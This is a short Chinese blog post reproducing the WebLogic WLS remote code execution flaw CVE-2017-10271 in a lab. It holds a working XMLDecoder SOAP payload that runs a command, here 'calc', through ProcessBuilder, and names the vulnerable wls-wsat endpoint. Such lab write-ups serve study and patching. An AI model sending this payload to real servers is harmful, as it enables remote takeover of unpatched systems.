WebLogic WLS组件漏洞复现

2018-01-06  本文已影响0人  __周__
漏洞编号:CVE-2017-10271
受影响WebLogic版本:

漏洞复现环境搭建

靶机:win7 x64
攻击机:win8 x64

靶机相关环境

安装JDK(java版本):
安装JDK.png
安装WebLogic

WebLogic 版本:10.3.6.0

图片.png 图片.png 图片.png

C:\Oracle\Middleware\user_projects\domains\base_domain\startWebLogic.cmd

输入用户名,密码登录

漏洞利用

漏洞利用POC

<soapenv:Envelope     xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
       <work:WorkContext    xmlns:work="http://bea.com/2004/06/soap/workarea/">
           <java      version="1.8" class="java.beans.XMLDecoder">
               <void     class="java.lang.ProcessBuilder">
                    <array    class="java.lang.String" length="3">
                        <void     index="0">
                           <string>calc</string>
                        </void>
                        <void     index="1">
                            <string></string>
                        </void>
                        <void     index="2">
                            <string> </string>
                        </void>
                    </array>
                <void     method="start"/></void>
           </java>
       </work:WorkContext>
   </soapenv:Header>
    <soapenv:Body/>
    </soapenv:Envelope>

利用过程

http://192.168.1.32:7001/wls-wsat/CoordinatorPortType

burp.png

返回状态 500

图片.png 图片.png
上一篇 下一篇

猜你喜欢

热点阅读